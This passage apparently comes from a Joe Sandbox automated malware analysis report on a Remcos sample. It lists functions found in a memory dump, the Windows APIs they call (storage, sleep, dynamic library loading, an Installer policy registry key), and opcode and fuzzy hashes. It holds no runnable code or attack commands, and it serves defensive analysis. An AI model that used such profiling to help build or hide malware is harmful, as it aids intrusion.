                                                                Function 00383F4C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • StgOpenStorage.OLE32(?,00000000,00000020,00000000,00000000,?), ref: 00383F75
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: OpenStorage
                                                                • String ID: &
                                                                • API String ID: 222319337-1010288
                                                                • Opcode ID: 7eeb890de045ebc51f227c9c538a4044d6459d72c4507a1f2e58460097ff73b1
                                                                • Instruction ID: 90d4e7eedc4c0cba928cff501886b36ed809dbe5c7e08a2ab3416ae53962ae4f
                                                                • Opcode Fuzzy Hash: 7eeb890de045ebc51f227c9c538a4044d6459d72c4507a1f2e58460097ff73b1
                                                                • Instruction Fuzzy Hash: 2C912870A10219AFDB15EFA4DD98E6EB7BDFF14314B0445A8F516E7690DB20BD44CB20
                                                                Function 003888B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52sleeplibraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(0000000A), ref: 003888D6
                                                                • GetProcAddress.KERNEL32(?), ref: 0038891F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressProcSleep
                                                                • String ID: OLE32
                                                                • API String ID: 1175476452-2276369563
                                                                • Opcode ID: 42b67e6fbb1e0a4547c4be98de4e3958468144433e5c5a33d53539ec4714731f
                                                                • Instruction ID: 93b7a504c9455b200d363e2043ee58798ab7610ec24a46bf7718826069b5f638
                                                                • Opcode Fuzzy Hash: 42b67e6fbb1e0a4547c4be98de4e3958468144433e5c5a33d53539ec4714731f
                                                                • Instruction Fuzzy Hash: 8A01B172614351ABDB1BBB35AC1A6263AECEB85350F4504FDD541C7290EFB0DC00C761
                                                                Function 00388D4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52sleeplibraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • Sleep.KERNEL32(0000000A), ref: 00388D70
                                                                • GetProcAddress.KERNEL32(?), ref: 00388DB9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressProcSleep
                                                                • String ID: KERNEL32
                                                                • API String ID: 1175476452-1217789123
                                                                • Opcode ID: 1b3246e92b2484c891fdfb4dd9dad630c236cfbca34aae53cb31b10b242aee4c
                                                                • Instruction ID: 78ece605585b80974f48fb0f7808d08fa48ef4ed8c2ed7303eb6ac93db3c0bb0
                                                                • Opcode Fuzzy Hash: 1b3246e92b2484c891fdfb4dd9dad630c236cfbca34aae53cb31b10b242aee4c
                                                                • Instruction Fuzzy Hash: A401F1716143509BDB2BBB39AC197663A9DEB91354F1904FED841DB290EF70DC0487A0
                                                                Function 00382F5E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegOpenKeyExW.ADVAPI32(80000002,Software\Policies\Microsoft\Windows\Installer,00000000,00020019,HZ8,?,00385A48,?,?,?), ref: 00382F8B
                                                                Strings
                                                                • HZ8, xrefs: 00382F7F
                                                                • Software\Policies\Microsoft\Windows\Installer, xrefs: 00382F85
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: Open
                                                                • String ID: HZ8$Software\Policies\Microsoft\Windows\Installer
                                                                • API String ID: 71445658-1056301759
                                                                • Opcode ID: 2029cb9d41526defe786175e17adfd6bf2b2875cea165a3219c20fdf728c6a02
                                                                • Instruction ID: f62d5e4aaea9ee20fc439be255af88b30936e0436951e8dd93ad94d7d9682b38
                                                                • Opcode Fuzzy Hash: 2029cb9d41526defe786175e17adfd6bf2b2875cea165a3219c20fdf728c6a02
                                                                • Instruction Fuzzy Hash: 7FD05E715147CC6EF7136754AC09B737AACC380328F0400D8B60C510A6C5658C64C360